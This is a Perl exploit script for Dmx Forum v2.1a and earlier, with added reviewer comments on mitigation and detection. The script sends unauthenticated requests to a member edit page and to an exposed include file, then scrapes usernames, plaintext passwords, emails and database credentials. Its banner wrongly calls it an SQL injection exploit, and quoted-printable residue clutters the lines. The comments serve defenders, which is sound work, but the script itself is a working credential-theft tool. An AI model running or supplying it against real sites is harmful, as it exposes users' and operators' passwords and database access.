
Dmx Forum <= v2.1a Remote Passwords Disclosure



#!/usr/bin/perl=0D
#=0D
# by DarkFig -- www.acid-root.new.fr=0D 
#=0D
use LWP::Simple;=0D
=0D
# Argument check. The rest of the script uses $ARGV[0] as the forum base URL
# and $ARGV[1] as the value of the "membre" query parameter. When $ARGV[1] is
# missing (or false, e.g. "0"), print the banner and usage text and exit via
# end().
# NOTE(review): the usage/example strings look truncated; any <placeholder>
# text was probably stripped together with the page's HTML -- confirm against
# another copy of the advisory.
# NOTE(review): the trailing "=0D" on each line appears to be quoted-printable
# residue (an encoded carriage return) from the archive, not program text.
if ( !$ARGV[1] ) {=0D
header();=0D
print "\n| Usage:   ----------------|";=0D
print "\n+------------------------------------------+";=0D
print "\n| Example: http://localhost/dmx/ 1 ------|";=0D 
end();=0D
}=0D
=0D
# header: print the three-line banner to STDOUT. Takes no arguments; its
# return value is not used by any caller in this script.
# NOTE(review): the banner says "SQL Injection" while the advisory title says
# "Remote Passwords Disclosure"; the requests built later in this script carry
# no injection payload, only a member id and a static path.
sub header {=0D
print "\n+------------------------------------------+";=0D
print "\n| Dmx Forum <= v2.1a SQL Injection Exploit |";=0D
print "\n+------------------------------------------+";=0D
}=0D
=0D
# end: print the closing rule and terminate the process. exit is called with
# no argument, so the exit status is 0 on every path, including the usage and
# failure paths.
sub end {=0D
print "\n+------------------------------------------+\n";=0D
exit;=0D
}=0D
=0D
# Main flow: two independent unauthenticated GET requests, each followed by
# regex scraping of the response body. The "=0D" suffixes appear to be
# quoted-printable residue from the archive, not program text.

# Message printed when a fetch returns a false value.
$err0 = "\n[-]Can't connect to the host !";=0D
=0D
header();=0D
# Part 1: request the member edit form for the id given in $ARGV[1].
# What this demonstrates for defenders: pops/edit.php returns a member's
# profile form for a caller-supplied "membre" id, and the form's pseudo, pwd
# and email inputs arrive pre-filled in their value attributes. The script
# sends no cookie or credential, so the page is presumably reachable without a
# session check -- confirm against the application source.
# Mitigation: require an authenticated session and check that it owns the
# requested member id; never echo a password into a form field; store only
# salted password hashes, so there is nothing recoverable to echo.
$url = "$ARGV[0]"."pops/edit.php?membre="."$ARGV[1]";=0D
# LWP::Simple::get returns undef on failure; "or print" only reports it, and
# execution continues into the matches below with an undefined $req.
$req = get($url) or print "$err0";=0D
=0D
if( $req =~ /input name="pseudo" type="text" id="pseudo" value="(.*?)"/ ){=0D
print "\n [+]Username: $1";=0D
# The comma operator runs print whether or not the match succeeded; on a
# failed match $1 still holds the previous capture, so the printed value can
# be stale.
$req =~ /input name="pwd" type="password" id="pwd" value="(.*?)"/ , print "\n [+]Password: $1";=0D
$req =~ /input name="email" type="text" id="email" value="(.*?)"/ , print "\n [+]Email: $1";} else {print "\n[-]Part 1 failed !";}=0D
=0D
=0D
# Part 2: request the include file _includes/bd.inc directly and read the
# host / user / pass / bdd assignments out of it.
# What this demonstrates for defenders: the configuration include is inside
# the web root, and the script expects it back as source text; presumably the
# server does not hand the .inc extension to the PHP interpreter -- verify on
# the deployment.
# Mitigation: keep credential files outside the document root, or give them an
# interpreted extension, or deny web access to the include directory; rotate
# the database credentials if the file was ever reachable.
# Detection: access-log entries for GET .../_includes/bd.inc, or for
# pops/edit.php?membre=<id> from clients with no session, are the requests
# this script generates.
$url2 = "$ARGV[0]"."_includes/bd.inc";=0D
$req2 = get($url2) or print "$err0";=0D
if($req2 =~ /host = "(.*?)";/)=0D
{print "\n[+]DBHOST: $1";=0D
# Each print below runs unconditionally after its match; a failed match leaves
# $1 at the previous capture, so a label can show the wrong value.
$req2 =~ /user = "(.*?)";/;print "\n[+]DBUSER: $1";=0D
$req2 =~ /pass = "(.*?)";/;print "\n[+]DBPASS: $1";=0D
$req2 =~ /bdd = "(.*?)";/;print "\n[+]DBNAME: $1";=0D
} else {print "\n[-]Part 2 failed !";}=0D
=0D
# Print the closing rule and exit with status 0.
end();
